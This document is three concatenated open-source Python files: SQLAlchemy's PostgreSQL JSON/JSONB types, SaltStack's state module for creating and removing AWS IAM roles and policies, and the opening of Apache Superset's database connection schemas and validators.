.. versionadded:: 1.1
"""
super(JSON, self).__init__(none_as_null=none_as_null)
if astext_type is not None:
self.astext_type = astext_type
class Comparator(sqltypes.JSON.Comparator):
"""Define comparison operations for :class:`.JSON`."""
@property
def astext(self):
"""On an indexed expression, use the "astext" (e.g. "->>")
conversion when rendered in SQL.
E.g.::
select([data_table.c.data['some key'].astext])
.. seealso::
:meth:`.ColumnElement.cast`
"""
if isinstance(self.expr.right.type, sqltypes.JSON.JSONPathType):
return self.expr.left.operate(
JSONPATH_ASTEXT,
self.expr.right, result_type=self.type.astext_type)
else:
return self.expr.left.operate(
ASTEXT, self.expr.right, result_type=self.type.astext_type)
comparator_factory = Comparator
colspecs[sqltypes.JSON] = JSON
ischema_names['json'] = JSON
class JSONB(JSON):
"""Represent the Postgresql JSONB type.
The :class:`.JSONB` type stores arbitrary JSONB format data, e.g.::
data_table = Table('data_table', metadata,
Column('id', Integer, primary_key=True),
Column('data', JSONB)
)
with engine.connect() as conn:
conn.execute(
data_table.insert(),
data = {"key1": "value1", "key2": "value2"}
)
The :class:`.JSONB` type includes all operations provided by
:class:`.JSON`, including the same behaviors for indexing operations.
It also adds additional operators specific to JSONB, including
:meth:`.JSONB.Comparator.has_key`, :meth:`.JSONB.Comparator.has_all`,
:meth:`.JSONB.Comparator.has_any`, :meth:`.JSONB.Comparator.contains`,
and :meth:`.JSONB.Comparator.contained_by`.
Like the :class:`.JSON` type, the :class:`.JSONB` type does not detect
in-place changes when used with the ORM, unless the
:mod:`sqlalchemy.ext.mutable` extension is used.
Custom serializers and deserializers
are shared with the :class:`.JSON` class, using the ``json_serializer``
and ``json_deserializer`` keyword arguments. These must be specified
at the dialect level using :func:`.create_engine`. When using
psycopg2, the serializers are associated with the jsonb type using
``psycopg2.extras.register_default_jsonb`` on a per-connection basis,
in the same way that ``psycopg2.extras.register_default_json`` is used
to register these handlers with the json type.
.. versionadded:: 0.9.7
.. seealso::
:class:`.JSON`
"""
__visit_name__ = 'JSONB'
class Comparator(JSON.Comparator):
"""Define comparison operations for :class:`.JSON`."""
def has_key(self, other):
"""Boolean expression. Test for presence of a key. Note that the
key may be a SQLA expression.
"""
return self.operate(HAS_KEY, other, result_type=sqltypes.Boolean)
def has_all(self, other):
"""Boolean expression. Test for presence of all keys in jsonb
"""
return self.operate(HAS_ALL, other, result_type=sqltypes.Boolean)
def has_any(self, other):
"""Boolean expression. Test for presence of any key in jsonb
"""
return self.operate(HAS_ANY, other, result_type=sqltypes.Boolean)
def contains(self, other, **kwargs):
"""Boolean expression. Test if keys (or array) are a superset
of/contained the keys of the argument jsonb expression.
"""
return self.operate(CONTAINS, other, result_type=sqltypes.Boolean)
def contained_by(self, other):
"""Boolean expression. Test if keys are a proper subset of the
keys of the argument jsonb expression.
"""
return self.operate(
CONTAINED_BY, other, result_type=sqltypes.Boolean)
comparator_factory = Comparator
ischema_names['jsonb'] = JSONB
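# Illustrative sketch (not part of the original source): typical use of the
# JSONB comparison operators defined above, assuming a ``data_table`` with a
# JSONB ``data`` column:
#
#     from sqlalchemy import select
#
#     stmt = select([data_table]).where(
#         data_table.c.data.contains({"key1": "value1"})    # @> operator
#     )
#     stmt = select([data_table]).where(
#         data_table.c.data.has_key("key2")                  # ? operator
#     )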
|
|
"""
Manage IAM roles
================
.. versionadded:: 2014.7.0
This module uses ``boto``, which can be installed via package, or pip.
This module accepts explicit IAM credentials but can also utilize
IAM roles assigned to the instance through Instance Profiles. Dynamic
credentials are then automatically obtained from AWS API and no further
configuration is necessary. More information available `here
<http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/iam-roles-for-amazon-ec2.html>`_.
If IAM roles are not used you need to specify the access credentials either in a pillar file or
in the minion's config file:
.. code-block:: yaml
iam.keyid: GKTADJGHEIQSXMKKRBJ08H
iam.key: askdjghsdfjkghWupUjasdflkdfklgjsdfjajkghs
It's also possible to specify ``key``, ``keyid`` and ``region`` via a profile, either
passed in as a dict, or as a string to pull from pillars or minion config:
.. code-block:: yaml
myprofile:
keyid: GKTADJGHEIQSXMKKRBJ08H
key: askjghsdfjkghWupUjasdflkdfklgjsdfjajkghs
region: us-east-1
Creating a role will automatically create an instance profile and associate it
with the role. This is the default behavior of the AWS console.
.. code-block:: yaml
myrole:
boto_iam_role.present:
- region: us-east-1
- key: GKTADJGHEIQSXMKKRBJ08H
- keyid: askdjghsdfjkghWupUjasdflkdfklgjsdfjajkghs
- policies_from_pillars:
- shared_iam_bootstrap_policy
- policies:
MySQSPolicy:
Statement:
- Action:
- sqs:*
Effect: Allow
Resource:
- arn:aws:sqs:*:*:*
Sid: MyPolicySQS1
MyS3Policy:
Statement:
- Action:
- s3:GetObject
Effect: Allow
Resource:
- arn:aws:s3:*:*:mybucket/*
# Using a credentials profile from pillars
myrole:
boto_iam_role.present:
- profile: myiamprofile
# Passing in a credentials profile
myrole:
boto_iam_role.present:
- profile:
key: GKTADJGHEIQSXMKKRBJ08H
keyid: askdjghsdfjkghWupUjasdflkdfklgjsdfjajkghs
region: us-east-1
If ``delete_policies: False`` is specified, existing policies that are not in
the given list of policies will not be deleted. This allows manual modifications
on the IAM role to be persistent. This functionality was added in 2015.8.0.
.. note::
When using the ``profile`` parameter and ``region`` is set outside of
the profile group, region is ignored and a default region will be used.
If ``region`` is missing from the ``profile`` data set, ``us-east-1``
will be used as the default region.
"""
import logging
import salt.utils.dictdiffer
import salt.utils.dictupdate as dictupdate
from salt.utils.odict import OrderedDict
log = logging.getLogger(__name__)
def __virtual__():
"""
Only load if boto is available.
"""
if "boto_iam.role_exists" in __salt__:
return "boto_iam_role"
return (False, "boto_iam module could not be loaded")
def present(
name,
policy_document=None,
policy_document_from_pillars=None,
path=None,
policies=None,
policies_from_pillars=None,
managed_policies=None,
create_instance_profile=True,
region=None,
key=None,
keyid=None,
profile=None,
delete_policies=True,
):
"""
Ensure the IAM role exists.
name
Name of the IAM role.
policy_document
The policy that grants an entity permission to assume the role.
(See https://boto.readthedocs.io/en/latest/ref/iam.html#boto.iam.connection.IAMConnection.create_role)
policy_document_from_pillars
A pillar key that contains a role policy document. The statements
defined here will be appended with the policy document statements
defined in the policy_document argument.
.. versionadded:: 2017.7.0
path
The path to the role/instance profile.
(See https://boto.readthedocs.io/en/latest/ref/iam.html#boto.iam.connection.IAMConnection.create_role)
policies
A dict of IAM role policies.
policies_from_pillars
A list of pillars that contain role policy dicts. Policies in the
pillars will be merged in the order defined in the list and key
conflicts will be handled by later defined keys overriding earlier
defined keys. The policies defined here will be merged with the
policies defined in the policies argument. If keys conflict, the keys
in the policies argument will override the keys defined in
policies_from_pillars.
managed_policies
A list of (AWS or Customer) managed policies to be attached to the role.
create_instance_profile
A boolean of whether or not to create an instance profile and associate
it with this role.
region
Region to connect to.
key
Secret key to be used.
keyid
Access key to be used.
profile
A dict with region, key and keyid, or a pillar key (string)
that contains a dict with region, key and keyid.
delete_policies
Deletes existing policies that are not in the given list of policies. Default
value is ``True``. If ``False`` is specified, existing policies will not be deleted
allowing manual modifications on the IAM role to be persistent.
.. versionadded:: 2015.8.0
"""
ret = {"name": name, "result": True, "comment": "", "changes": {}}
# Build up _policy_document
_policy_document = {}
if policy_document_from_pillars:
from_pillars = __salt__["pillar.get"](policy_document_from_pillars)
if from_pillars:
_policy_document["Version"] = from_pillars["Version"]
_policy_document.setdefault("Statement", [])
_policy_document["Statement"].extend(from_pillars["Statement"])
if policy_document:
_policy_document["Version"] = policy_document["Version"]
_policy_document.setdefault("Statement", [])
_policy_document["Statement"].extend(policy_document["Statement"])
_ret = _role_present(name, _policy_document, path, region, key, keyid, profile)
# Build up _policies
if not policies:
policies = {}
if not policies_from_pillars:
policies_from_pillars = []
if not managed_policies:
managed_policies = []
_policies = {}
for policy in policies_from_pillars:
_policy = __salt__["pillar.get"](policy)
_policies.update(_policy)
_policies.update(policies)
ret["changes"] = _ret["changes"]
ret["comment"] = " ".join([ret["comment"], _ret["comment"]])
if not _ret["result"]:
ret["result"] = _ret["result"]
if ret["result"] is False:
return ret
if create_instance_profile:
_ret = _instance_profile_present(name, region, key, keyid, profile)
ret["changes"] = dictupdate.update(ret["changes"], _ret["changes"])
ret["comment"] = " ".join([ret["comment"], _ret["comment"]])
if not _ret["result"]:
ret["result"] = _ret["result"]
if ret["result"] is False:
return ret
_ret = _instance_profile_associated(name, region, key, keyid, profile)
ret["changes"] = dictupdate.update(ret["changes"], _ret["changes"])
ret["comment"] = " ".join([ret["comment"], _ret["comment"]])
if not _ret["result"]:
ret["result"] = _ret["result"]
if ret["result"] is False:
return ret
_ret = _policies_present(
name, _policies, region, key, keyid, profile, delete_policies
)
ret["changes"] = dictupdate.update(ret["changes"], _ret["changes"])
ret["comment"] = " ".join([ret["comment"], _ret["comment"]])
if not _ret["result"]:
ret["result"] = _ret["result"]
_ret = _policies_attached(name, managed_policies, region, key, keyid, profile)
ret["changes"] = dictupdate.update(ret["changes"], _ret["changes"])
ret["comment"] = " ".join([ret["comment"], _ret["comment"]])
if not _ret["result"]:
ret["result"] = _ret["result"]
return ret
def _role_present(
name,
policy_document=None,
path=None,
region=None,
key=None,
keyid=None,
profile=None,
):
ret = {"result": True, "comment": "", "changes": {}}
role = __salt__["boto_iam.describe_role"](name, region, key, keyid, profile)
if not role:
if __opts__["test"]:
ret["comment"] = "IAM role {} is set to be created.".format(name)
ret["result"] = None
return ret
created = __salt__["boto_iam.create_role"](
name, policy_document, path, region, key, keyid, profile
)
if created:
ret["changes"]["old"] = {"role": None}
ret["changes"]["new"] = {"role": name}
ret["comment"] = "IAM role {} created.".format(name)
else:
ret["result"] = False
ret["comment"] = "Failed to create {} IAM role.".format(name)
else:
ret["comment"] = "{} role present.".format(name)
if not policy_document:
_policy_document = __salt__["boto_iam.build_policy"](
region, key, keyid, profile
)
else:
_policy_document = policy_document
if salt.utils.dictdiffer.deep_diff(
_sort_policy(role["assume_role_policy_document"]),
_sort_policy(_policy_document),
):
if __opts__["test"]:
msg = "Assume role policy document to be updated."
ret["comment"] = "{} {}".format(ret["comment"], msg)
ret["result"] = None
return ret
updated = __salt__["boto_iam.update_assume_role_policy"](
name, _policy_document, region, key, keyid, profile
)
if updated:
msg = "Assume role policy document updated."
ret["comment"] = "{} {}".format(ret["comment"], msg)
ret["changes"]["old"] = {
"policy_document": role["assume_role_policy_document"]
}
ret["changes"]["new"] = {"policy_document": _policy_document}
else:
ret["result"] = False
msg = "Failed to update assume role policy."
ret["comment"] = "{} {}".format(ret["comment"], msg)
return ret
def _instance_profile_present(name, region=None, key=None, keyid=None, profile=None):
ret = {"result": True, "comment": "", "changes": {}}
exists = __salt__["boto_iam.instance_profile_exists"](
name, region, key, keyid, profile
)
if not exists:
if __opts__["test"]:
ret["comment"] = "Instance profile {} is set to be created.".format(name)
ret["result"] = None
return ret
created = __salt__["boto_iam.create_instance_profile"](
name, region, key, keyid, profile
)
if created:
ret["changes"]["old"] = {"instance_profile": None}
ret["changes"]["new"] = {"instance_profile": name}
ret["comment"] = "Instance profile {} created.".format(name)
else:
ret["result"] = False
ret["comment"] = "Failed to create {} instance profile.".format(name)
return ret
def _instance_profile_associated(name, region=None, key=None, keyid=None, profile=None):
ret = {"result": True, "comment": "", "changes": {}}
is_associated = __salt__["boto_iam.profile_associated"](
name, name, region, key, keyid, profile
)
if not is_associated:
if __opts__["test"]:
ret["comment"] = "Instance profile {} is set to be associated.".format(name)
ret["result"] = None
return ret
associated = __salt__["boto_iam.associate_profile_to_role"](
name, name, region, key, keyid, profile
)
if associated:
ret["changes"]["old"] = {"profile_associated": None}
ret["changes"]["new"] = {"profile_associated": True}
ret["comment"] = "Instance profile {} associated.".format(name)
else:
ret["result"] = False
ret[
"comment"
] = "Failed to associate {0} instance profile with {0} role.".format(name)
return ret
def _sort_policy(doc):
"""
List-type sub-items in policies don't happen to be order-sensitive, but
compare operations will render them unequal, leading to non-idempotent
state runs. We'll sort any list-type subitems before comparison to reduce
the likelihood of false negatives.
"""
if isinstance(doc, list):
return sorted(_sort_policy(i) for i in doc)
elif isinstance(doc, (dict, OrderedDict)):
return {k: _sort_policy(v) for k, v in doc.items()}
return doc
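# Illustrative sketch (not part of the original source): _sort_policy makes
# two logically equivalent policy documents compare equal even when their
# list-type sub-items are ordered differently, e.g.:
#
#     a = {"Statement": [{"Action": ["s3:GetObject", "s3:PutObject"]}]}
#     b = {"Statement": [{"Action": ["s3:PutObject", "s3:GetObject"]}]}
#     assert _sort_policy(a) == _sort_policy(b)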
def _policies_present(
name,
policies=None,
region=None,
key=None,
keyid=None,
profile=None,
delete_policies=True,
):
ret = {"result": True, "comment": "", "changes": {}}
policies_to_create = {}
policies_to_delete = []
for policy_name, policy in policies.items():
_policy = __salt__["boto_iam.get_role_policy"](
name, policy_name, region, key, keyid, profile
)
if _policy != policy:
policies_to_create[policy_name] = policy
_list = __salt__["boto_iam.list_role_policies"](name, region, key, keyid, profile)
for policy_name in _list:
if delete_policies and policy_name not in policies:
policies_to_delete.append(policy_name)
if policies_to_create or policies_to_delete:
_to_modify = list(policies_to_delete)
_to_modify.extend(policies_to_create)
if __opts__["test"]:
ret["comment"] = "{} policies to be modified on role {}.".format(
", ".join(_to_modify), name
)
ret["result"] = None
return ret
ret["changes"]["old"] = {"policies": _list}
for policy_name, policy in policies_to_create.items():
policy_set = __salt__["boto_iam.create_role_policy"](
name, policy_name, policy, region, key, keyid, profile
)
if not policy_set:
_list = __salt__["boto_iam.list_role_policies"](
name, region, key, keyid, profile
)
ret["changes"]["new"] = {"policies": _list}
ret["result"] = False
ret["comment"] = "Failed to add policy {} to role {}".format(
policy_name, name
)
return ret
for policy_name in policies_to_delete:
policy_unset = __salt__["boto_iam.delete_role_policy"](
name, policy_name, region, key, keyid, profile
)
if not policy_unset:
_list = __salt__["boto_iam.list_role_policies"](
name, region, key, keyid, profile
)
ret["changes"]["new"] = {"policies": _list}
ret["result"] = False
ret["comment"] = "Failed to remove policy {} from role {}".format(
policy_name, name
)
return ret
_list = __salt__["boto_iam.list_role_policies"](
name, region, key, keyid, profile
)
ret["changes"]["new"] = {"policies": _list}
ret["comment"] = "{} policies modified on role {}.".format(
", ".join(_list), name
)
return ret
def _policies_attached(
name, managed_policies=None, region=None, key=None, keyid=None, profile=None
):
ret = {"result": True, "comment": "", "changes": {}}
policies_to_attach = []
policies_to_detach = []
for policy in managed_policies or []:
entities = __salt__["boto_iam.list_entities_for_policy"](
policy,
entity_filter="Role",
region=region,
key=key,
keyid=keyid,
profile=profile,
)
found = False
for roledict in entities.get("policy_roles", []):
if name == roledict.get("role_name"):
found = True
break
if not found:
policies_to_attach.append(policy)
_list = __salt__["boto_iam.list_attached_role_policies"](
name, region=region, key=key, keyid=keyid, profile=profile
)
oldpolicies = [x.get("policy_arn") for x in _list]
for policy_data in _list:
if (
policy_data.get("policy_name") not in managed_policies
and policy_data.get("policy_arn") not in managed_policies
):
policies_to_detach.append(policy_data.get("policy_arn"))
if policies_to_attach or policies_to_detach:
_to_modify = list(policies_to_detach)
_to_modify.extend(policies_to_attach)
if __opts__["test"]:
ret["comment"] = "{} policies to be modified on role {}.".format(
", ".join(_to_modify), name
)
ret["result"] = None
return ret
ret["changes"]["old"] = {"managed_policies": oldpolicies}
for policy_name in policies_to_attach:
policy_set = __salt__["boto_iam.attach_role_policy"](
policy_name,
role_name=name,
region=region,
key=key,
keyid=keyid,
profile=profile,
)
if not policy_set:
_list = __salt__["boto_iam.list_attached_role_policies"](
name, region=region, key=key, keyid=keyid, profile=profile
)
newpolicies = [x.get("policy_arn") for x in _list]
ret["changes"]["new"] = {"managed_policies": newpolicies}
ret["result"] = False
ret["comment"] = "Failed to add policy {} to role {}".format(
policy_name, name
)
return ret
for policy_name in policies_to_detach:
policy_unset = __salt__["boto_iam.detach_role_policy"](
policy_name,
role_name=name,
region=region,
key=key,
keyid=keyid,
profile=profile,
)
if not policy_unset:
_list = __salt__["boto_iam.list_attached_role_policies"](
name, region=region, key=key, keyid=keyid, profile=profile
)
newpolicies = [x.get("policy_arn") for x in _list]
ret["changes"]["new"] = {"managed_policies": newpolicies}
ret["result"] = False
ret["comment"] = "Failed to remove policy {} from role {}".format(
policy_name, name
)
return ret
_list = __salt__["boto_iam.list_attached_role_policies"](
name, region=region, key=key, keyid=keyid, profile=profile
)
newpolicies = [x.get("policy_arn") for x in _list]
log.debug(newpolicies)
ret["changes"]["new"] = {"managed_policies": newpolicies}
ret["comment"] = "{} policies modified on role {}.".format(
", ".join(newpolicies), name
)
return ret
def absent(name, region=None, key=None, keyid=None, profile=None):
"""
Ensure the IAM role is deleted.
name
Name of the IAM role.
region
Region to connect to.
key
Secret key to be used.
keyid
Access key to be used.
profile
A dict with region, key and keyid, or a pillar key (string)
that contains a dict with region, key and keyid.
"""
ret = {"name": name, "result": True, "comment": "", "changes": {}}
_ret = _policies_absent(name, region, key, keyid, profile)
ret["changes"] = _ret["changes"]
ret["comment"] = " ".join([ret["comment"], _ret["comment"]])
if not _ret["result"]:
ret["result"] = _ret["result"]
if ret["result"] is False:
return ret
_ret = _policies_detached(name, region, key, keyid, profile)
ret["changes"] = _ret["changes"]
ret["comment"] = " ".join([ret["comment"], _ret["comment"]])
if not _ret["result"]:
ret["result"] = _ret["result"]
if ret["result"] is False:
return ret
_ret = _instance_profile_disassociated(name, region, key, keyid, profile)
ret["changes"] = dictupdate.update(ret["changes"], _ret["changes"])
ret["comment"] = " ".join([ret["comment"], _ret["comment"]])
if not _ret["result"]:
ret["result"] = _ret["result"]
if ret["result"] is False:
return ret
_ret = _instance_profile_absent(name, region, key, keyid, profile)
ret["changes"] = dictupdate.update(ret["changes"], _ret["changes"])
ret["comment"] = " ".join([ret["comment"], _ret["comment"]])
if not _ret["result"]:
ret["result"] = _ret["result"]
if ret["result"] is False:
return ret
_ret = _role_absent(name, region, key, keyid, profile)
ret["changes"] = dictupdate.update(ret["changes"], _ret["changes"])
ret["comment"] = " ".join([ret["comment"], _ret["comment"]])
if not _ret["result"]:
ret["result"] = _ret["result"]
return ret
def _role_absent(name, region=None, key=None, keyid=None, profile=None):
ret = {"result": True, "comment": "", "changes": {}}
exists = __salt__["boto_iam.role_exists"](name, region, key, keyid, profile)
if exists:
if __opts__["test"]:
ret["comment"] = "IAM role {} is set to be removed.".format(name)
ret["result"] = None
return ret
deleted = __salt__["boto_iam.delete_role"](name, region, key, keyid, profile)
if deleted:
ret["changes"]["old"] = {"role": name}
ret["changes"]["new"] = {"role": None}
ret["comment"] = "IAM role {} removed.".format(name)
else:
ret["result"] = False
ret["comment"] = "Failed to delete {} iam role.".format(name)
else:
ret["comment"] = "{} role does not exist.".format(name)
return ret
def _instance_profile_absent(name, region=None, key=None, keyid=None, profile=None):
ret = {"result": True, "comment": "", "changes": {}}
exists = __salt__["boto_iam.instance_profile_exists"](
name, region, key, keyid, profile
)
if exists:
if __opts__["test"]:
ret["comment"] = "Instance profile {} is set to be removed.".format(name)
ret["result"] = None
return ret
deleted = __salt__["boto_iam.delete_instance_profile"](
name, region, key, keyid, profile
)
if deleted:
ret["changes"]["old"] = {"instance_profile": name}
ret["changes"]["new"] = {"instance_profile": None}
ret["comment"] = "Instance profile {} removed.".format(name)
else:
ret["result"] = False
ret["comment"] = "Failed to delete {} instance profile.".format(name)
else:
ret["comment"] = "{} instance profile does not exist.".format(name)
return ret
def _policies_absent(name, region=None, key=None, keyid=None, profile=None):
ret = {"result": True, "comment": "", "changes": {}}
_list = __salt__["boto_iam.list_role_policies"](name, region, key, keyid, profile)
if not _list:
ret["comment"] = "No policies in role {}.".format(name)
return ret
if __opts__["test"]:
ret["comment"] = "{} policies to be removed from role {}.".format(
", ".join(_list), name
)
ret["result"] = None
return ret
ret["changes"]["old"] = {"policies": _list}
for policy_name in _list:
policy_unset = __salt__["boto_iam.delete_role_policy"](
name, policy_name, region, key, keyid, profile
)
if not policy_unset:
_list = __salt__["boto_iam.list_role_policies"](
name, region, key, keyid, profile
)
ret["changes"]["new"] = {"policies": _list}
ret["result"] = False
ret["comment"] = "Failed to add policy {} to role {}".format(
policy_name, name
)
return ret
_list = __salt__["boto_iam.list_role_policies"](name, region, key, keyid, profile)
ret["changes"]["new"] = {"policies": _list}
ret["comment"] = "{} policies removed from role {}.".format(", ".join(_list), name)
return ret
def _policies_detached(name, region=None, key=None, keyid=None, profile=None):
ret = {"result": True, "comment": "", "changes": {}}
_list = __salt__["boto_iam.list_attached_role_policies"](
role_name=name, region=region, key=key, keyid=keyid, profile=profile
)
oldpolicies = [x.get("policy_arn") for x in _list]
if not _list:
ret["comment"] = "No attached policies in role {}.".format(name)
return ret
if __opts__["test"]:
ret["comment"] = "{} policies to be detached from role {}.".format(
", ".join(oldpolicies), name
)
ret["result"] = None
return ret
ret["changes"]["old"] = {"managed_policies": oldpolicies}
for policy_arn in oldpolicies:
policy_unset = __salt__["boto_iam.detach_role_policy"](
policy_arn, name, region=region, key=key, keyid=keyid, profile=profile
)
if not policy_unset:
_list = __salt__["boto_iam.list_attached_role_policies"](
name, region=region, key=key, keyid=keyid, profile=profile
)
newpolicies = [x.get("policy_arn") for x in _list]
ret["changes"]["new"] = {"managed_policies": newpolicies}
ret["result"] = False
ret["comment"] = "Failed to detach {} from role {}".format(policy_arn, name)
return ret
_list = __salt__["boto_iam.list_attached_role_policies"](
name, region=region, key=key, keyid=keyid, profile=profile
)
newpolicies = [x.get("policy_arn") for x in _list]
ret["changes"]["new"] = {"managed_policies": newpolicies}
ret["comment"] = "{} policies detached from role {}.".format(
", ".join(newpolicies), name
)
return ret
def _instance_profile_disassociated(
name, region=None, key=None, keyid=None, profile=None
):
ret = {"result": True, "comment": "", "changes": {}}
is_associated = __salt__["boto_iam.profile_associated"](
name, name, region, key, keyid, profile
)
if is_associated:
if __opts__["test"]:
ret["comment"] = "Instance profile {} is set to be disassociated.".format(
name
)
ret["result"] = None
return ret
associated = __salt__["boto_iam.disassociate_profile_from_role"](
name, name, region, key, keyid, profile
)
if associated:
ret["changes"]["old"] = {"profile_associated": True}
ret["changes"]["new"] = {"profile_associated": False}
ret["comment"] = "Instance profile {} disassociated.".format(name)
else:
ret["result"] = False
ret[
"comment"
] = "Failed to disassociate {0} instance profile from {0} role.".format(
name
)
return ret
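# Illustrative sketch (not part of the original source): tearing a role down
# with the ``absent`` state mirrors the ``present`` examples in the module
# docstring, e.g.:
#
#     myrole:
#       boto_iam_role.absent:
#         - region: us-east-1
#         - profile: myiamprofile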
|
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import inspect
import json
from typing import Any, Dict, Optional, Type
from flask import current_app
from flask_babel import lazy_gettext as _
from marshmallow import EXCLUDE, fields, pre_load, Schema, validates_schema
from marshmallow.validate import Length, ValidationError
from marshmallow_enum import EnumField
from sqlalchemy import MetaData
from sqlalchemy.engine.url import make_url
from sqlalchemy.exc import ArgumentError
from superset import db
from superset.db_engine_specs import BaseEngineSpec, get_engine_specs
from superset.exceptions import CertificateException, SupersetSecurityException
from superset.models.core import ConfigurationMethod, Database, PASSWORD_MASK
from superset.security.analytics_db_safety import check_sqlalchemy_uri
from superset.utils.core import markdown, parse_ssl_cert
database_schemas_query_schema = {
"type": "object",
"properties": {"force": {"type": "boolean"}},
}
database_name_description = "A database name to identify this connection."
port_description = "Port number for the database connection."
cache_timeout_description = (
"Duration (in seconds) of the caching timeout for charts of this database. "
"A timeout of 0 indicates that the cache never expires. "
"Note this defaults to the global timeout if undefined."
)
expose_in_sqllab_description = "Expose this database to SQL Lab"
allow_run_async_description = (
"Operate the database in asynchronous mode, meaning "
"that the queries are executed on remote workers as opposed "
"to on the web server itself. "
"This assumes that you have a Celery worker setup as well "
"as a results backend. Refer to the installation docs "
"for more information."
)
allow_file_upload_description = (
"Allow to upload CSV file data into this database"
"If selected, please set the schemas allowed for csv upload in Extra."
)
allow_ctas_description = "Allow CREATE TABLE AS option in SQL Lab"
allow_cvas_description = "Allow CREATE VIEW AS option in SQL Lab"
allow_dml_description = (
"Allow users to run non-SELECT statements "
"(UPDATE, DELETE, CREATE, ...) "
"in SQL Lab"
)
allow_multi_schema_metadata_fetch_description = (
"Allow SQL Lab to fetch a list of all tables and all views across "
"all database schemas. For large data warehouse with thousands of "
"tables, this can be expensive and put strain on the system."
) # pylint: disable=invalid-name
configuration_method_description = (
"Configuration_method is used on the frontend to "
"inform the backend whether to explode parameters "
"or to provide only a sqlalchemy_uri."
)
impersonate_user_description = (
"If Presto, all the queries in SQL Lab are going to be executed as the "
"currently logged on user who must have permission to run them.<br/>"
"If Hive and hive.server2.enable.doAs is enabled, will run the queries as "
"service account, but impersonate the currently logged on user "
"via hive.server2.proxy.user property."
)
force_ctas_schema_description = (
"When allowing CREATE TABLE AS option in SQL Lab, "
"this option forces the table to be created in this schema"
)
encrypted_extra_description = markdown(
"JSON string containing additional connection configuration.<br/>"
"This is used to provide connection information for systems like "
"Hive, Presto, and BigQuery, which do not conform to the username:password "
"syntax normally used by SQLAlchemy.",
True,
)
extra_description = markdown(
"JSON string containing extra configuration elements.<br/>"
"1. The ``engine_params`` object gets unpacked into the "
"[sqlalchemy.create_engine]"
"(https://docs.sqlalchemy.org/en/latest/core/engines.html#"
"sqlalchemy.create_engine) call, while the ``metadata_params`` "
"gets unpacked into the [sqlalchemy.MetaData]"
"(https://docs.sqlalchemy.org/en/rel_1_0/core/metadata.html"
"#sqlalchemy.schema.MetaData) call.<br/>"
"2. The ``metadata_cache_timeout`` is a cache timeout setting "
"in seconds for metadata fetch of this database. Specify it as "
'**"metadata_cache_timeout": {"schema_cache_timeout": 600, '
'"table_cache_timeout": 600}**. '
"If unset, cache will not be enabled for the functionality. "
"A timeout of 0 indicates that the cache never expires.<br/>"
"3. The ``schemas_allowed_for_file_upload`` is a comma separated list "
"of schemas that CSVs are allowed to upload to. "
'Specify it as **"schemas_allowed_for_file_upload": '
'["public", "csv_upload"]**. '
"If database flavor does not support schema or any schema is allowed "
"to be accessed, just leave the list empty<br/>"
"4. the ``version`` field is a string specifying the this db's version. "
"This should be used with Presto DBs so that the syntax is correct<br/>"
"5. The ``allows_virtual_table_explore`` field is a boolean specifying "
"whether or not the Explore button in SQL Lab results is shown.",
True,
)
get_export_ids_schema = {"type": "array", "items": {"type": "integer"}}
sqlalchemy_uri_description = markdown(
"Refer to the "
"[SqlAlchemy docs]"
"(https://docs.sqlalchemy.org/en/rel_1_2/core/engines.html#"
"database-urls) "
"for more information on how to structure your URI.",
True,
)
server_cert_description = markdown(
"Optional CA_BUNDLE contents to validate HTTPS requests. Only available "
"on certain database engines.",
True,
)
def sqlalchemy_uri_validator(value: str) -> str:
"""
    Validate that the value is a valid SQLAlchemy URI and refuse SQLite by default
"""
try:
uri = make_url(value.strip())
except (ArgumentError, AttributeError, ValueError) as ex:
raise ValidationError(
[
_(
"Invalid connection string, a valid string usually follows: "
"driver://user:password@database-host/database-name"
)
]
) from ex
if current_app.config.get("PREVENT_UNSAFE_DB_CONNECTIONS", True):
try:
check_sqlalchemy_uri(uri)
except SupersetSecurityException as ex:
raise ValidationError([str(ex)]) from ex
return value
def server_cert_validator(value: str) -> str:
"""
Validate the server certificate
"""
if value:
try:
parse_ssl_cert(value)
except CertificateException as ex:
raise ValidationError([_("Invalid certificate")]) from ex
return value
def encrypted_extra_validator(value: str) -> str:
"""
Validate that encrypted extra is a valid JSON string
"""
if value:
try:
json.loads(value)
except json.JSONDecodeError as ex:
raise ValidationError(
[_("Field cannot be decoded by JSON. %(msg)s", msg=str(ex))]
) from ex
return value
def extra_validator(value: str) -> str:
"""
Validate that extra is a valid JSON string, and that metadata_params
keys are on the call signature for SQLAlchemy Metadata
"""
if value:
try:
extra_ = json.loads(value)
except json.JSONDecodeError as ex:
raise ValidationError(
[_("Field cannot be decoded by JSON. %(msg)s", msg=str(ex))]
) from ex
else:
metadata_signature = inspect.signature(MetaData)
for key in extra_.get("metadata_params", {}):
if key not in metadata_signature.parameters:
raise ValidationError(
[
_(
"The metadata_params in Extra field "
"is not configured correctly. The key "
"%(key)s is invalid.",
key=key,
)
]
)
return value
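# Illustrative sketch (not part of the original module): the validators above are
# plain functions and can be exercised directly. ``metadata_params`` keys must
# match keyword arguments of ``sqlalchemy.MetaData``; anything else is rejected.
#
#     extra_validator('{"engine_params": {"pool_size": 5}}')            # passes
#     extra_validator('{"metadata_params": {"schema": "analytics"}}')   # passes
#     extra_validator('{"metadata_params": {"not_a_kwarg": 1}}')        # raises ValidationError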
class DatabaseParametersSchemaMixin: # pylint: disable=too-few-public-methods
"""
Allow SQLAlchemy URI to be passed as separate parameters.
This mixin is a first step in allowing the users to test, create and
edit databases without having to know how to write a SQLAlchemy URI.
    Instead, each database defines the parameters that it takes (e.g.,
username, password, host, etc.) and the SQLAlchemy URI is built from
these parameters.
When using this mixin make sure that `sqlalchemy_uri` is not required.
"""
engine = fields.String(allow_none=True, description="SQLAlchemy engine to use")
parameters = fields.Dict(
keys=fields.String(),
values=fields.Raw(),
description="DB-specific parameters for configuration",
)
configuration_method = EnumField(
ConfigurationMethod,
by_value=True,
description=configuration_method_description,
missing=ConfigurationMethod.SQLALCHEMY_FORM,
)
# pylint: disable=no-self-use, unused-argument
@pre_load
def build_sqlalchemy_uri(
self, data: Dict[str, Any], **kwargs: Any
) -> Dict[str, Any]:
